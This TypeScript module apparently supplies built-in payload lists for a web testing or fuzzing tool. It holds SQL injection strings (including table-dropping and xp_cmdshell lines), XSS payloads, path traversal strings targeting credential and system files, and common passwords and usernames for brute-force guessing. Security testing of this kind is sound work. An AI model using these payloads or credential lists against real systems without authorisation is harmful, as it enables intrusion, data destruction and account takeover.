export interface BuiltinList {
  id: string
  label: string
  values: string[]
}

export const SQL_INJECTION: string[] = [
  "' OR '1'='1",
  "' OR '1'='1' --",
  "' OR '1'='1' /*",
  "' OR 1=1 --",
  "' OR 1=1#",
  '" OR "1"="1',
  "admin'--",
  "admin' #",
  "' UNION SELECT NULL --",
  "' UNION SELECT NULL,NULL --",
  "' UNION SELECT NULL,NULL,NULL --",
  "1' ORDER BY 1--",
  "1' ORDER BY 2--",
  "1' ORDER BY 3--",
  "1 AND 1=1",
  "1 AND 1=2",
  "1' AND '1'='1",
  "1' AND '1'='2",
  "'; DROP TABLE users--",
  "'; EXEC xp_cmdshell('dir')--",
  "' AND SLEEP(5)--",
  "1; WAITFOR DELAY '0:0:5'--",
  "' AND (SELECT * FROM users) = 1--",
  "' OR EXISTS(SELECT * FROM users)--",
  "0x27",
  "%27",
  "\\",
  "1'1",
  "'`",
  "1/**/OR/**/1=1",
]

export const XSS: string[] = [
  '<script>alert(1)</script>',
  '<img src=x onerror=alert(1)>',
  '<svg onload=alert(1)>',
  '"><script>alert(1)</script>',
  "'><script>alert(1)</script>",
  '<body onload=alert(1)>',
  '<iframe src="javascript:alert(1)">',
  '<a href="javascript:alert(1)">click</a>',
  '<<SCRIPT>alert("XSS");//<</SCRIPT>',
  '<IMG SRC=JaVaScRiPt:alert("XSS")>',
  '<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>',
  '&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;',
  '%3Cscript%3Ealert(1)%3C%2Fscript%3E',
  '<scr<script>ipt>alert(1)</scr</script>ipt>',
  'javascript:alert(1)',
  '<details open ontoggle=alert(1)>',
  '<input onfocus=alert(1) autofocus>',
  '<select onfocus=alert(1) autofocus>',
  '<video src=1 onerror=alert(1)>',
  '<audio src=1 onerror=alert(1)>',
]

export const PATH_TRAVERSAL: string[] = [
  '../',
  '../../',
  '../../../',
  '../../../../',
  '../../../../../',
  '../../../../../../',
  '../../../../../../../',
  '../../../../../../../../',
  '../../../../../../../../../',
  '../../../../../../../../../../',
  '..\\',
  '..\\..',
  '..\\..\\..\\',
  '%2e%2e%2f',
  '%2e%2e/',
  '..%2f',
  '%2e%2e%5c',
  '..%5c',
  '%252e%252e%252f',
  '..%252f',
  '..%c0%af',
  '..%c1%9c',
  '/etc/passwd',
  '/etc/shadow',
  '/etc/hosts',
  '/proc/self/environ',
  'C:\\Windows\\System32\\drivers\\etc\\hosts',
  '../../../../etc/passwd',
]

export const COMMON_PASSWORDS: string[] = [
  '123456', 'password', '12345678', 'qwerty', '123456789', '12345',
  '1234', '111111', '1234567', 'dragon', '123123', 'baseball',
  'iloveyou', 'monkey', 'letmein', 'master', 'sunshine', 'ashley',
  'bailey', 'passw0rd', 'shadow', '123321', 'superman', 'michael',
  'football', 'batman', 'trustno1', 'hunter', 'ranger', 'harley',
  'dakota', 'abc123', 'password1', 'password123', 'admin', 'admin123',
  'root', 'toor', 'pass', 'test', 'guest', 'hello', '1q2w3e4r',
  'qwerty123', 'zaq12wsx', 'p@ssw0rd', 'P@ssw0rd', 'P@$$w0rd',
  'Welcome1', 'Welcome123', 'changeme', 'changeme!', 'Ch@ngeme1',
  'iloveyou1', 'princess', 'rockyou', '12341234', 'qwertyuiop',
  'asdfghjkl', 'zxcvbnm', '1234567890', '0987654321', 'qazwsx',
  'edcrfv', 'tgbyhn', 'Password1', 'Password123', 'Letmein1',
  'Passw0rd', 'Summer2024', 'Winter2024', 'Spring2024', 'Fall2024',
  'Company123', 'Company1!', 'Aa123456', '1234Abcd', 'Abcd1234',
  'password!', 'password@', 'password#', '123qwe', 'qwe123',
  'aaaaaaaa', 'aaaaaa', '111222', '112233', 'qweasd', 'asdzxc',
  '123456a', 'a123456', '666666', '888888', 'password2', 'password12',
  'abc', 'admin1', '1111', '2222', '3333', '4444', '5555', '6666',
  '7777', '8888', '9999', '0000',
]

export const COMMON_USERNAMES: string[] = [
  'admin', 'administrator', 'root', 'user', 'guest', 'test',
  'demo', 'info', 'webmaster', 'support', 'mail', 'email',
  'manager', 'operator', 'staff', 'system', 'service', 'web',
  'db', 'database', 'super', 'superuser', 'sa', 'dev', 'developer',
  'api', 'app', 'application', 'server', 'login', 'default',
  'helpdesk', 'postmaster', 'ftp', 'anonymous', 'nobody',
  'www', 'mysql', 'oracle', 'postgres', 'tomcat', 'nginx',
  'apache', 'ubuntu', 'centos', 'debian', 'ansible', 'deploy',
  'backup', 'monitor', 'nagios', 'zabbix', 'jenkins', 'git',
  'svn', 'cvs', 'ldap', 'ntp', 'smtp', 'pop', 'imap', 'vpn',
]

export const FUZZING_CHARS: string[] = [
  '', ' ', '\t', '\n', '\r', '\0',
  '!', '"', '#', '$', '%', '&', "'", '(', ')', '*', '+',
  ',', '-', '.', '/', ':', ';', '<', '=', '>', '?', '@',
  '[', '\\', ']', '^', '_', '`', '{', '|', '}', '~',
  '\'', '\"', '\\n', '\\r', '\\t', '\\0',
  '..', '...', '../../../../', '../',
  '<>', '<<>>', '><', '>>', '<<',
  '%%', '%%s', '%s%s%s%s',
  'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',
  String.fromCharCode(0),
  '\xFF\xFF\xFF\xFF',
  '☃', '𠜎', '😀',
  'null', 'undefined', 'NaN', 'Infinity', '-Infinity',
  'true', 'false', '0', '-1', '2147483647', '-2147483648',
  '9999999999999999', '0.0', '1e308',
]

export const BUILTIN_LISTS: BuiltinList[] = [
  { id: 'sql_injection',    label: 'SQL Injection',    values: SQL_INJECTION },
  { id: 'xss',              label: 'XSS',              values: XSS },
  { id: 'path_traversal',   label: 'Path Traversal',   values: PATH_TRAVERSAL },
  { id: 'common_passwords', label: 'Common Passwords', values: COMMON_PASSWORDS },
  { id: 'common_usernames', label: 'Common Usernames', values: COMMON_USERNAMES },
  { id: 'fuzzing_chars',    label: 'Fuzzing Characters', values: FUZZING_CHARS },
]
